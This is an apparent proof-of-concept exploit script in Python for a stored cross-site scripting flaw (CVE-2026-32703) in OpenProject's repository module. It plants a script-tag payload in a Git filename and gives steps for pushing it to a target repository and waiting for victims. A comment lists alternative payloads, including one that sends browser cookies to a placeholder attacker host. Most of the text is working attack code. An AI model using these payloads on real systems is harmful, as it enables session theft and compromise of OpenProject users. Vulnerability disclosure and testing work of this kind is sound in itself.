CVE-2026-32703 OpenProject仓库模块存储型XSS漏洞

# CVE-2026-32703 PoC - OpenProject Stored XSS via Repository Filename # Requires: Git, access to push to OpenProject repository import subprocess import sys def exploit(): """ This PoC demonstrates how an attacker with push access can inject malicious JavaScript through a specially crafted filename in a Git commit. """ # Malicious filename containing XSS payload malicious_filename = '<script>alert(String.fromCharCode(88,83,83))</script>.txt' # Alternative payloads that could be used: # <img src=x onerror=alert(document.cookie)> - Steal cookies # <svg/onload=fetch('https://attacker.com/?c='+document.cookie)> - Exfiltrate data # <iframe src="javascript:alert(document.domain)"> - Domain disclosure commands = [ # Initialize a git repo for testing (in real scenario, clone existing repo) "git init", "git config user.email '[email protected]'", "git config user.name 'Attacker'", # Create the malicious file with XSS payload in filename f"touch '{malicious_filename}'", f"git add '{malicious_filename}'", # Commit the malicious file "git commit -m 'Add documentation file'", # Display the malicious commit "git log --oneline -1", ] print("[*] CVE-2026-32703 OpenProject Stored XSS PoC") print("[*] This PoC creates a commit with XSS payload in filename") print(f"[*] Malicious filename: {malicious_filename}") print("[*] When this file is displayed in OpenProject repositories page,") print("[*] the script tag will execute in victim's browser.") for cmd in commands: print(f"\n[+] Executing: {cmd}") result = subprocess.run(cmd, shell=True, capture_output=True, text=True) if result.stdout: print(result.stdout) if result.stderr: print(result.stderr, file=sys.stderr) print("\n[!] In real attack scenario:") print("[!] 1. Push this commit to target OpenProject repository") print("[!] 2. Wait for victims to view the repository page") print("[!] 3. XSS payload executes in victim's browser") if __name__ == '__main__': exploit()